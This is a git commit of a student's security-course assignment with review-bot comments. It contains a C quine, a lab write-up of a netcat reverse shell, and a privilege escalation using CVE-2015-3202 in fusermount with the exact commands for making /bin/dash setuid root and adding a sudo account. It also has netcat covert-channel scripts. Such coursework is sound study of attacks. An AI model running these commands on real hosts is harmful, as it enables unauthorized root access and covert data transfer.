| field | value | date |
|---|---|---|
| author | Camil Staps | 2015-12-14 10:25:09 +0000 |
| committer | Camil Staps | 2015-12-14 10:25:09 +0000 |
| commit | 346407a55f00111a675304433ff5a7ee19569098 | |
| tree | c0a6662dfc9796b842ad92b8e0938933b318ce63 | |
| parent | Finish assignment 4 | |
Finish assignment 5
| mode | file | lines |
|---|---|---|
| -rw-r--r-- | CamilStaps-s4498062-Assignment-5/ex1.c | 1 |
| -rw-r--r-- | CamilStaps-s4498062-Assignment-5/ex2 | 28 |
| -rw-r--r-- | CamilStaps-s4498062-Assignment-5/ex3/readme | 10 |
| -rwxr-xr-x | CamilStaps-s4498062-Assignment-5/ex3/receive.sh | 14 |
| -rwxr-xr-x | CamilStaps-s4498062-Assignment-5/ex3/send.sh | 16 |
5 files changed, 69 insertions, 0 deletions
diff --git a/CamilStaps-s4498062-Assignment-5/ex1.c b/CamilStaps-s4498062-Assignment-5/ex1.c new file mode 100644 index 0000000..2596f16 --- /dev/null +++ b/CamilStaps-s4498062-Assignment-5/ex1.c @@ -0,0 +1 @@ +int main(void){char *s="int main(void){char *s=%c%s%c;printf(s,0x22,s,0x22);return 0;}";printf(s,0x22,s,0x22);return 0;} diff --git a/CamilStaps-s4498062-Assignment-5/ex2 b/CamilStaps-s4498062-Assignment-5/ex2 new file mode 100644 index 0000000..023e137 --- /dev/null +++ b/CamilStaps-s4498062-Assignment-5/ex2 
@@ -0,0 +1,28 @@ +a + There is not much to explain here.. we open a listening netcat in the first terminal and the command second terminal opens a connection to it from the server we should attack, and executes /bin/bash. + + We then have a shell for www-data in the first terminal. + +c + I used https://www.exploit-db.com/exploits/37089/ which exploits CVE-2015-3202. It exploits a bug in fusermount which allows us to overwrite some file with root rights. We then overwrite /etc/bash.bashrc or /etc/default/locale or so to point to a script in /tmp, in which we do something that we want to be done with root rights. I used chmod 4755 /bin/dash, as suggested there. Then next time root logs in (in the case of /etc/bash.bashrc) or some cron job running with root rights sources /etc/default/locale, the exploit is executed. You can them come back and find /bin/dash with u+s rights, so you can get root rights in that shell. + + I then created my own account (camil) with sudo rights so that I could clean up without losing root rights in case I would need it later. In particular, I removed the suid bit from /bin/dash so that others wouldn't find it and use it (e.g. find / -perm -u=s -type f 2>/dev/null) + + Concretely, the commands used were: + + $ printf "chmod 4755 /bin/dash" > /tmp/exploit + $ printf 755 /tmp/exploit + $ mkdir -p '/tmp/exploit||/tmp/exploit' + $ LIBMOUNT_MTAB=/etc/default/locale _FUSE_COMMFD=0 fusermount '/tmp/exploit||/tmp/exploit' + fusermount: failed to open /etc/fuse.conf: Permission denied + sending file descriptor: Socket operation on non-socket + $ cat /etc/default/locale + /dev/fuse /tmp/exploit||/tmp/exploit fuse rw,nosuid,nodev,user=www-data 0 0 + + When locale is sourced, /dev/fuse /tmp/exploit will be piped to /tmp/exploit, so the latter is executed. + + I had /etc/bash.bashrc changed as well since sometime on Saturday, but unfortunately root didn't login. 
I also found that using /etc/bash.bashrc isn't very stealthy, because if you're using bash as unprivileged user, you see: + + bash: /dev/fuse: Permission denied + chmod: changing permissions of `/bin/dash': Operation not permitted + diff --git a/CamilStaps-s4498062-Assignment-5/ex3/readme b/CamilStaps-s4498062-Assignment-5/ex3/readme new file mode 100644 index 0000000..cb95949 --- /dev/null +++ b/CamilStaps-s4498062-Assignment-5/ex3/readme @@ -0,0 +1,10 @@ +The sender opens a port for a 1, doesn't do anything to send a 0. Obviously, the receiver should know the sender's IP address. + +Usage on the receiver's side: + + $ ./receive.sh + +Usage on the sender's side: + + $ echo 010101110110110 | ./send.sh + diff --git a/CamilStaps-s4498062-Assignment-5/ex3/receive.sh b/CamilStaps-s4498062-Assignment-5/ex3/receive.sh new file mode 100755 index 0000000..4944d9c --- /dev/null +++ b/CamilStaps-s4498062-Assignment-5/ex3/receive.sh @@ -0,0 +1,14 @@ +#!/bin/bash +SERVER=localhost +PORT=12345 + +while :; do + timeout 1 nc "$SERVER" "$PORT" 2>/dev/null + if [[ "$?" == "1" ]]; then + echo -n "0" + sleep 1 + else + echo -n "1" + fi +done + diff --git a/CamilStaps-s4498062-Assignment-5/ex3/send.sh b/CamilStaps-s4498062-Assignment-5/ex3/send.sh new file mode 100755 index 0000000..b0ad02d --- /dev/null +++ b/CamilStaps-s4498062-Assignment-5/ex3/send.sh @@ -0,0 +1,16 @@ +#!/bin/bash +PORT=12345 + +# For every input line +while IFS= read -r payload; do + # For every character + for (( i=0; i<${#payload}+1; i+=1 )); do + char="${payload:$i:1}" + if [[ "$char" == "1" ]]; then + timeout 1 nc -lp "$PORT" >/dev/null + else + sleep 1 + fi + done +done + |
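Review bot: ex1.c calls `printf` without `#include <stdio.h>`, so the one-line quine relies on an implicit function declaration that C99 and later do not allow and that gcc and clang warn about by default. Adding the include on its own line only keeps the program a quine if the template string `s` is extended in the same way (the newline would need a `%c` escape like the quotes already have), so either state which compiler and standard the exercise was checked with, or change the program and `s` together.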
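Review bot: ex2 has sections `a` and `c` but no `b`; either add the answer for part b or say it was skipped. The cleanup paragraph only mentions removing the suid bit from /bin/dash, while the line written into /etc/default/locale (`/dev/fuse /tmp/exploit||/tmp/exploit fuse ...`), the modified /etc/bash.bashrc, the files under /tmp/exploit and the extra `camil` account with sudo rights are not listed as restored or removed. The writeup should enumerate every change left on the host, both for grading and because each one is an artifact an administrator would find; the `Permission denied` / `Operation not permitted` lines quoted at the end of the section are exactly that kind of trace, printed to every unprivileged bash user.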
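Review bot: the ex3 readme says the receiver must know the sender's address, but receive.sh hardcodes `SERVER=localhost` and both scripts hardcode `PORT=12345`; the readme should say these have to be edited (or passed in) before the usage lines work, and that the input must consist of `0` and `1` only, because send.sh treats any other character as a 0. It is also worth stating the obvious limitation that every bit costs one TCP connection attempt to a fixed port, so the channel is plainly visible in connection logs or to a port-scan detector.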
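Review bot: the 0/1 decision in receive.sh depends on `nc` exiting with status exactly 1 on a refused connection, which differs between netcat implementations, and the `else` branch catches every other status, including 124 from `timeout`, 127 if `nc` is missing, and a DNS or routing failure for a wrong `$SERVER`, all of which are then printed as an endless run of 1s. Check the status the script relies on explicitly and treat anything unexpected as an error. There is also no start synchronization or framing with send.sh, so the receiver's 1-second sampling window can straddle a bit boundary and read a bit twice or miss it; the loop never terminates and never emits a trailing newline either.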
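Review bot: the loop bound in send.sh, `i<${#payload}+1`, runs one iteration past the last character; `${payload:$i:1}` is then empty, falls into the `else` branch, and transmits a spurious trailing 0 after every input line. The bound should be `i<${#payload}`. The script also silently sends any non-`1` character as a 0, so rejecting input that is not made of 0s and 1s would catch a stray space or newline. Finally, netcat implementations differ on whether `-l` and `-p` may be combined in `nc -lp "$PORT"`, so the readme should say which netcat the scripts were tested with.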